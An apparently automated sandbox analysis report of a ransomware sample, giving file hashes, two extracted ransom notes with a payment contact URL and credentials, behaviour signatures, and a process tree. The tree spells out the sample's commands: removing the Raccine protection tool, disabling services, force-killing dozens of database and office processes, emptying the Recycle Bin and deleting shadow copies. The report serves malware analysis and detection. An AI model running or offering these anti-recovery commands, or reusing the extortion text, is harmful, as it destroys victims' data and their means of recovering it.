Analysis
-
max time kernel
151s -
max time network
124s -
platform
windows10_x64 -
resource
win10-en-20210920 -
submitted
29-10-2021 12:15
General
-
Target
fb17fb6e1e71c92d2ae5a06363886ea71d614e2603706d38ca8ebbc56d3dc120.exe
-
Size
109KB
-
MD5
2bd337b8648c7a465a1f94ba4a99c344
-
SHA1
509cb9c71d34ec78c7fa937506758ae9ad0ebdd6
-
SHA256
fb17fb6e1e71c92d2ae5a06363886ea71d614e2603706d38ca8ebbc56d3dc120
-
SHA512
d31b87213494f9173d288a971704b384a582a3dd3fd3a7a4dec8f01aef9db3e8e08213fdb8b308db0a1320dbd4b8bcf553b4fbbe3d9a180b8faab432932dc667
Score
10/10
Malware Config
Extracted
Path
C:\Users\Admin\AppData\Local\Temp\RESTORE_FILES_INFO.txt
Ransom Note
Hello !!!
Many of your documents, photos, passwords, databases and other files are no longer
available as they were encrypted. You may be looking for a way to
recover your files,
but don't waste your time. No one will be able to recover your files without our decryption KEY (if someone says they can do it,
theywill also contact me and
I will make the price much more expensive than if you contacted directly).
DONT USE GMAIL.COM TO CONTACT US
!!!THE DATARECOVERY COMPANIES JUST WANT YOUR MONEY!!!
!!DATA RECOVERY COMPANIES WILL ONLY INCREASE THE DECRYPTION TIME!!
Can i Recover My Files?Sure. We guarantee that you can recover all your files safely and easily But You have not so enough time .As fast you pay as
fastall of your data will be back as before encryption.
Send e-mail to this address: [email protected]
Or contact
https://supportdatarecovery.cc/users.php user:Wanqu password:zVIJmqEB
You have to pay for decryption in Bitcoins.
ATTENTION !!!
Do not rename encrypted files.Do not try to decrypt your data using third party software, it may cause permanent data loss.Decryption of your files with
the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam.
We also have all your information to
share .It is in your best interest to contact us as soon as possible.
Key Identifier:
JCtOvbNKClHRinQPBqfybeUkenhrvtaAgO28ngiGE5wH5iMQQr0oqa8gJA4GakZwOjfNiZyeZOWoIAqvNxaL/YrAa3cDofhLXhYr43sEWQ6P+uNAhV3KmnYxqjo+/To7F/g0K5/4Qp7qN2cOrQqSJzZy2B+Dua6Q96QWupndOK3nlyTgMLKc3YkTzCwTixQV70lbQuaBzGIAd2BFQXT1u2G16Nz26QKoQ/msyrgaFkKb8OxxTZqlUxJYp3tZEOutarrCssTqXunDMNb+yppLR9jIxWXvaXAhPv0xC8TE2rAIrV4EmP0ignq7f6nrpdm7JCGAJ9su7FcFoGE/dfCfjbz/sB/P43/tGbFaxiMFquaMhJrsKhb/+pX87AukuY9oZKSDvMoQ3iTO+7CrldJlMsmabtzUAxQXoGZ+3ZAgn9GCybVNOjfR58rubu6oqtNJKXxgyrbTZ3TuQmII/eYXOyihfM/+ZsQoF2FxiXR7bvO2fQ+PDyCyTre2af/t68XE2rek1SuWnpn/rX2zVD5WKwhguwI8ajpRiTQCWDWamxRiowDlHoxz1J/SBPksWmflqiVGb9A8cfsc1qZS7Pe5tb26YnFuVFjgmjEuO0JQC9eRE9bG7CyeAf+tjV4MtEDSPcWOh1pAl5X/nMR5BjxfzsU0tX9iOBwrLRpfxI92VYY=
Emails
URLs
https://supportdatarecovery.cc/users.php
Extracted
Path
C:\Users\Admin\Desktop\RESTORE_FILES_INFO.hta
Ransom Note
Hello !!!
Many of your documents, photos, passwords, databases and other files are no longer
available as they were encrypted. You may be looking for a way to recover your files,
but don't waste your time. No one will be able to recover your files without our decryption KEY (if someone says they can do it, theywill also contact me and
I will make the price much more expensive than if you contacted directly).
DONT USE GMAIL.COM TO CONTACT US
!!!THE DATARECOVERY COMPANIES JUST WANT YOUR MONEY!!!
!!DATA RECOVERY COMPANIES WILL ONLY INCREASE THE DECRYPTION TIME!!
Can i Recover My Files?Sure. We guarantee that you can recover all your files safely and easily But You have not so enough time .As fast you pay as fastall of your data will be back as before encryption.
Send e-mail to this address: [email protected]
Or contact https://supportdatarecovery.cc/users.php user:Wanqu password:zVIJmqEB
You have to pay for decryption in Bitcoins.
ATTENTION !!!
Do not rename encrypted files.Do not try to decrypt your data using third party software, it may cause permanent data loss.Decryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam.
We also have all your information to share .It is in your best interest to contact us as soon as possible.
Key Identifier: JCtOvbNKClHRinQPBqfybeUkenhrvtaAgO28ngiGE5wH5iMQQr0oqa8gJA4GakZwOjfNiZyeZOWoIAqvNxaL/YrAa3cDofhLXhYr43sEWQ6P+uNAhV3KmnYxqjo+/To7F/g0K5/4Qp7qN2cOrQqSJzZy2B+Dua6Q96QWupndOK3nlyTgMLKc3YkTzCwTixQV70lbQuaBzGIAd2BFQXT1u2G16Nz26QKoQ/msyrgaFkKb8OxxTZqlUxJYp3tZEOutarrCssTqXunDMNb+yppLR9jIxWXvaXAhPv0xC8TE2rAIrV4EmP0ignq7f6nrpdm7JCGAJ9su7FcFoGE/dfCfjbz/sB/P43/tGbFaxiMFquaMhJrsKhb/+pX87AukuY9oZKSDvMoQ3iTO+7CrldJlMsmabtzUAxQXoGZ+3ZAgn9GCybVNOjfR58rubu6oqtNJKXxgyrbTZ3TuQmII/eYXOyihfM/+ZsQoF2FxiXR7bvO2fQ+PDyCyTre2af/t68XE2rek1SuWnpn/rX2zVD5WKwhguwI8ajpRiTQCWDWamxRiowDlHoxz1J/SBPksWmflqiVGb9A8cfsc1qZS7Pe5tb26YnFuVFjgmjEuO0JQC9eRE9bG7CyeAf+tjV4MtEDSPcWOh1pAl5X/nMR5BjxfzsU0tX9iOBwrLRpfxI92VYY=
Emails
URLs
https://supportdatarecovery.cc/users.php
Signatures
-
Disables Task Manager via registry modification
-
Modifies extensions of user files 22 IoCs
Ransomware generally changes the extension on encrypted files.
-
Drops startup file 1 IoCs
-
Drops desktop.ini file(s) 3 IoCs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Drops file in Program Files directory 32 IoCs
-
Drops file in Windows directory 23 IoCs
-
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Kills process with taskkill 48 IoCs
-
Modifies registry class 20 IoCs
-
Modifies registry key 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 49 IoCs
-
Suspicious use of FindShellTrayWindow 1 IoCs
-
Suspicious use of SendNotifyMessage 1 IoCs
-
Suspicious use of SetWindowsHookEx 1 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\fb17fb6e1e71c92d2ae5a06363886ea71d614e2603706d38ca8ebbc56d3dc120.exe"C:\Users\Admin\AppData\Local\Temp\fb17fb6e1e71c92d2ae5a06363886ea71d614e2603706d38ca8ebbc56d3dc120.exe"1⤵
- Modifies extensions of user files
- Drops startup file
- Drops desktop.ini file(s)
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\taskkill.exe"taskkill" /F /IM RaccineSettings.exe2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\reg.exe"reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F2⤵
-
-
C:\Windows\SysWOW64\reg.exe"reg" delete HKCU\Software\Raccine /F2⤵
- Modifies registry key
-
-
C:\Windows\SysWOW64\schtasks.exe"schtasks" /DELETE /TN "Raccine Rules Updater" /F2⤵
-
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config Dnscache start= auto2⤵
-
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config SQLTELEMETRY start= disabled2⤵
-
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config FDResPub start= auto2⤵
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin2⤵
-
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config SSDPSRV start= auto2⤵
-
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config SstpSvc start= disabled2⤵
-
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled2⤵
-
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config upnphost start= auto2⤵
-
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config SQLWriter start= disabled2⤵
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mspub.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mspub.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM synctime.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mydesktopqos.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM Ntrtscan.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mysqld.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mydesktopservice.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM isqlplussvc.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM sqbcoreservice.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM onenote.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM firefoxconfig.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM agntsvc.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM PccNTMon.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM excel.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM dbeng50.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM thebat.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM CNTAoSMgr.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM msaccess.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM steam.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM thebat64.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM sqlwriter.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM outlook.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM encsvc.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM ocomm.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM tbirdconfig.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM infopath.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM tmlisten.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" IM thunderbird.exe /F2⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM wordpad.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM dbsnmp.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mbamtray.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM msftesql.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mysqld-opt.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM xfssvccon.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM zoolz.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM ocautoupds.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM powerpnt.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM ocssd.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mydesktopqos.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM oracle.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM visio.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM sqlagent.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mydesktopservice.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM sqlbrowser.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM winword.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM sqlservr.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mysqld-nt.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }2⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" C:\Users\Admin\Desktop\RESTORE_FILES_INFO.hta2⤵
-
-
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122882⤵
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
MD5
52f031d4b3f5e869d2929a1c946786a4
SHA19a2a7aab2ef264be111ec030d4987e0e267005ff
SHA256a53b2e1a94620aad80d65e61a9349ac5c547a2848087ba0a77f21c3c64081ca0
SHA512db44f8b4c861de41a7cb615a3da39ac2e3a0aab078edd2b4b895ca66ab1a29cd1ea7458e46a464b89ee3cf20e534b240b89263310f65821bfd976bc9c7583161
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
-
-
-
-
-
-
-
-
-
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
-
-